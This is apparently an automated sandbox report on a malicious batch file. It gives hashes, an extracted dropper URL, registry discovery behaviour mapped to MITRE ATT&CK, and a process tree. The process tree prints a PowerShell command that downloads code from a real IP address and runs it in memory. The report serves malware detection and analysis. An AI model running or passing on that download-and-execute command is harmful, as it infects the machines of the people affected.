2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1

General

Target

hBjM939D.bat
Size

198B
MD5

31f14e4e5545659b2edf91aedb0830cb
SHA1

e5489bc5f3b8f118e6fb0ba7f5f4a0223a33863a
SHA256

2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1
SHA512

80298267b14e688189cfefabed44496c5c22a51c50c788ac72ed1b9ad4ab1848068308f1a7990665ebba4220a428cdb7a1a5695a3643ea395af7566726914562

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/hBjM939D

Signatures

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

WerFault.exe

pid	process
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe
5112	WerFault.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid process

5112 WerFault.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 5112 WerFault.exe
Token: SeBackupPrivilege 5112 WerFault.exe
Token: SeDebugPrivilege 5112 WerFault.exe

description	pid	process
Token: SeRestorePrivilege	5112	WerFault.exe
Token: SeBackupPrivilege	5112	WerFault.exe
Token: SeDebugPrivilege	5112	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hBjM939D.bat"
1⤵
PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hBjM939D');Invoke-MHYLWDFAYARXBSG;Start-Sleep -s 10000"
2⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 704
3⤵
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5112

\??\c:\windows\system32\taskhostw.exe
taskhostw.exe -RegisterDevice -SettingChange -Full
1⤵
PID:4184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/5112-0-0x0000000004460000-0x0000000004461000-memory.dmp

Filesize
4KB

Download
memory/5112-6-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-7-0x0000000004D90000-0x0000000004D91000-memory.dmp

Filesize
4KB

Download
memory/5112-8-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-9-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-10-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-11-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-12-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-13-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-14-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-15-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-16-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-17-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-18-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-19-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-20-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-21-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-22-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-23-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-24-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-25-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-26-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-27-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-28-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-29-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-30-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-31-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-32-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-33-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-34-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-35-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-36-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-37-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/5112-39-0x0000000004D90000-0x0000000004D91000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads